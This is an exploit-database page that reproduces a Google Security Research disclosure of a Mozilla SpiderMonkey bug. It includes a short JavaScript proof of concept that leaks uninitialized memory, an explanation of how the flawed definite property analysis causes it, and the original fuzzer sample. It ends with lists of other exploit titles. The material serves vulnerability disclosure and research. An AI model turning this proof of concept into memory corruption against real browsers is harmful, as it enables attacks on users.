Menu

Search for hundreds of thousands of exploits

"Mozilla Spidermonkey - Unboxed Objects Uninitialized Memory Access"

Author

"Google Security Research"

Platform

multiple

Release date

2019-07-10

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
/*
For constructors, Spidermonkey implements a "definite property analysis" [1] to compute which properties will definitely exist on the constructed objects. Spidermonkey then directly allocates the constructed objects with the final Shape. As such, at the entrypoint of the constructor the constructed objects will already "look like" they have all the properties that are only installed throughout the constructor. This mechanism e.g. makes it possible to omit some Shape updates in JITed code. See also https://bugs.chromium.org/p/project-zero/issues/detail?id=1791 for another short explanation of this mechanism.

The definite property analysis must ensure that "predefining" the properties in such a way will not be visible to the running script. In particular, it can only mark properties as definite if they aren't read or otherwise accessed before the assignment.

In the following JavaScript program, discovered through fuzzing and then manually modified, Spidermonkey appears to incorrectly handle such a scenario:
*/

    l = undefined;

    function v10() {
        let v15 = 0;
        try {
            const v16 = v15.foobar();
        } catch(v17) {
            l = this.uninitialized;
        }
        this.uninitialized = 1337;
    }

    for (let v36 = 0; v36 < 100; v36++) {
        const v38 = new v10();
        if (l !== undefined) {
            console.log("Success: 0x" + l.toString(16));
            break;
        }
    }

/*
When run on a local Spidermonkey built from the beta branch or in Firefox 66.0.3 with `javascript.options.unboxed_objects` set to true in about:config, it will eventually output something like:

	Success: 0x2d2d2d2d

Here, the definite property analysis concluded that .uninitialized is definitely assigned to the constructed objects and not accessed before it is assigned (which is wrong). In particular, it seems that the catch block is entirely ignored by the analysis as it is not present in the Ion graph representation of v10 on which the analysis is performed. As such, when reading .uninitialized in the catch block, uninitialized memory (which seems to be initialized with 0x2d in debug builds) is read from `this` and later printed to stdout. If the line `this.uninitialized = 1337;` is modified to instead assign a double value (e.g. `this.uninitialized = 13.37;`), then an assertion failure can be observed:

    Assertion failure: isDouble(), at js/src/build_DBG.OBJ/dist/include/js/Value.h:450

As unboxed properties can also store JSObject pointers, this bug can likely be turned into memory corruption as well. However, since this requires unboxed object, which have recently been disabled by default and appear to be fully removed soon, it likely only affects non-standard configurations of FireFox. If unboxed objects are disabled (e.g. through --no-unboxed-objects), then the analysis will still be incorrect and determine that .uninitialized can be "predefined". This can be observed by changing `l = this.uninitialized;` to `l = this.hasOwnProperty('uninitialized');` which will incorrectly return true. In that case, the property slots seem to be initialized with `undefined` though, so no memory safety violation occurs. However, I have not verified that they will always be initialized in that way. Furthermore, it might be possible to confuse property type inference in that case, but I have not attempted that.


Below is the original sample triggered by fuzzilli. It ended up reading the property by spreading |this|.

    // Run with --no-threads --ion-warmup-threshold=100
    function main() {
    const v3 = Object != Object;
    let v4 = v3;
    const v5 = typeof undefined;
    const v7 = v5 === "undefined";
    const v9 = Array();
    function v10(v11,v12) {
        let v15 = 0;
        try {
            const v16 = v15.race();
        } catch(v17) {
            for (let v21 = 0; v21 < 7; v21++) {
                let v24 = 0;
                while (v24 < 256) {
                    const v25 = v24 + 1;
                    v24 = v25;
                }
                const v26 = Array == v21;
                const v27 = {trimStart:v4,seal:v10,...v26,...v9,...v26,...v26,...this,...v7};
            }
        }
        for (let v30 = 0; v30 < 9; v30++) {
        }
        const v31 = v4 + 1;
        this.E = v31;
    }
    const v32 = v10();
    for (let v36 = 0; v36 < 5; v36++) {
        const v38 = new v10();
        let v39 = Object;
        const v41 = Object();
        const v42 = v41.getOwnPropertyDescriptors;
        let v43 = v42;
        const v44 = {LN10:v42,unshift:Object,isFinite:Object,test:v41,...v43,...v39,...v41};
    }
    }
    main();
    gc();
*/
Release Date Title Type Platform Author
2019-09-09 "Enigma NMS 65.0.0 - SQL Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - OS Command Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - Cross-Site Request Forgery" webapps multiple mark
2019-09-06 "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution" remote multiple "Justin Wagner"
2019-09-02 "Alkacon OpenCMS 10.5.x - Local File inclusion" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting" webapps multiple Aetsu
2019-08-29 "Webkit JSC: JIT - Uninitialized Variable Access in ArgumentsEliminationPhase::transform" dos multiple "Google Security Research"
2019-08-21 "Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities" remote multiple "Pedro Ribeiro"
2019-08-27 "Tableau - XML External Entity" webapps multiple "Jarad Kopf"
2019-08-23 "Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal" webapps multiple MaYaSeVeN
2019-08-21 "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)" webapps multiple "Alyssa Herrera"
2019-08-21 "LibreOffice < 6.2.6 Macro - Python Code Execution (Metasploit)" remote multiple LoadLow
2019-08-01 "SilverSHielD 6.x - Local Privilege Escalation" local multiple "Ian Bredemeyer"
2019-08-15 "NSKeyedUnarchiver - Info Leak in Decoding SGBigUTF8String" dos multiple "Google Security Research"
2019-08-12 "ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "WebKit - UXSS via XSLT and Nested Document Replacements" dos multiple "Google Security Research"
2019-08-08 "Aptana Jaxer 1.0.3.4547 - Local File inclusion" webapps multiple "Steph Jensen"
2019-08-07 "Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability" dos multiple "Google Security Research"
2019-08-05 "ARMBot Botnet - Arbitrary Code Execution" remote multiple prsecurity
2019-08-01 "Ultimate Loan Manager 2.0 - Cross-Site Scripting" webapps multiple "Metin Yunus Kandemir"
2019-07-31 "Oracle Hyperion Planning 11.1.2.3 - XML External Entity" webapps multiple "Lucas Dinucci"
2019-07-30 "iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects" dos multiple "Google Security Research"
2019-07-30 "iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1" dos multiple "Google Security Research"
2019-07-30 "iMessage - NSArray Deserialization can Invoke Subclass that does not Retain References" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - Loop-Invariant Code Motion (LICM) Leaves Object Property Access Unguarded" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS NSKeyedUnarchiver - Use-After-Free of ObjC Objects when Unarchiving OITSUIntDictionary Instances" dos multiple "Google Security Research"
Release Date Title Type Platform Author
2019-09-12 "Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts" dos windows "Google Security Research"
2019-09-12 "Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts" dos windows "Google Security Research"
2019-08-29 "Webkit JSC: JIT - Uninitialized Variable Access in ArgumentsEliminationPhase::transform" dos multiple "Google Security Research"
2019-08-26 "Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass" local windows "Google Security Research"
2019-08-15 "Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities" local windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Out-of-Bounds read due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in FixSbitSubTableFormat1" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in WriteTableFromStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadAllocFormat12CharGlyphMapList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadTableIntoStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in FixSbitSubTables" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Double Free in MergeFormat12Cmap / MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in GetGlyphIdx" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Returning a Dangling Pointer via MergeFontPackage" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators" dos windows "Google Security Research"
2019-08-15 "NSKeyedUnarchiver - Info Leak in Decoding SGBigUTF8String" dos multiple "Google Security Research"
2019-08-12 "WebKit - UXSS via XSLT and Nested Document Replacements" dos multiple "Google Security Research"
2019-08-12 "Linux - Use-After-Free Reads in show_numa_stats()" dos linux "Google Security Research"
2019-08-07 "Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability" dos multiple "Google Security Research"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47085/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47085/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47085/41470/mozilla-spidermonkey-unboxed-objects-uninitialized-memory-access/download/", "exploit_id": "47085", "exploit_description": "\"Mozilla Spidermonkey - Unboxed Objects Uninitialized Memory Access\"", "exploit_date": "2019-07-10", "exploit_author": "\"Google Security Research\"", "exploit_type": "dos", "exploit_platform": "multiple", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications including basic vulnerability identification.

Browse exploit APIBrowse